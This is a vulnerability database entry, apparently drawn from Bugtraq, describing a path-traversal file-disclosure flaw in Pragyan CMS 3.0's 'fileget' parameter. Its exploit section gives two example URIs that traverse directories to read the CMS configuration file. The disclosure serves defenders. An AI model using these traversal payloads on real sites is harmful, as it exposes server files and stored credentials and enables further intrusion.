ID

VAR-E-201201-0906


TITLE

Pragyan CMS 'fileget' Parameter Remote File Disclosure Vulnerability

Trust: 0.3

sources: BID: 51360

DESCRIPTION

Pragyan CMS is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view local files in the context of the webserver process, which may aid in further attacks.
Pragyan CMS 3.0 is vulnerable; other versions may also be affected.

Trust: 0.3

sources: BID: 51360

AFFECTED PRODUCTS

vendor: pragyan, model: cms pragyan cms, scope: eq, version: 3.0

Trust: 0.3

sources: BID: 51360

EXPLOIT

Attackers can exploit this issue through a browser.
The following example URIs are available:
http://www.example.com/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php
http://www.example.com/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php

Trust: 0.3

sources: BID: 51360

PRICE

Free

Trust: 0.3

sources: BID: 51360

TYPE

Input Validation Error

Trust: 0.3

sources: BID: 51360

CREDITS

Or4nG.M4N

Trust: 0.3

sources: BID: 51360

EXTERNAL IDS

db: BID, id: 51360

Trust: 0.3

sources: BID: 51360

REFERENCES

url: http://sourceforge.net/projects/pragyan/

Trust: 0.3

sources: BID: 51360

SOURCES

db: BID, id: 51360

LAST UPDATE DATE

2022-07-27T09:33:06.362000+00:00


SOURCES UPDATE DATE

db: BID, id: 51360, date: 2012-01-10T00:00:00

SOURCES RELEASE DATE

db: BID, id: 51360, date: 2012-01-10T00:00:00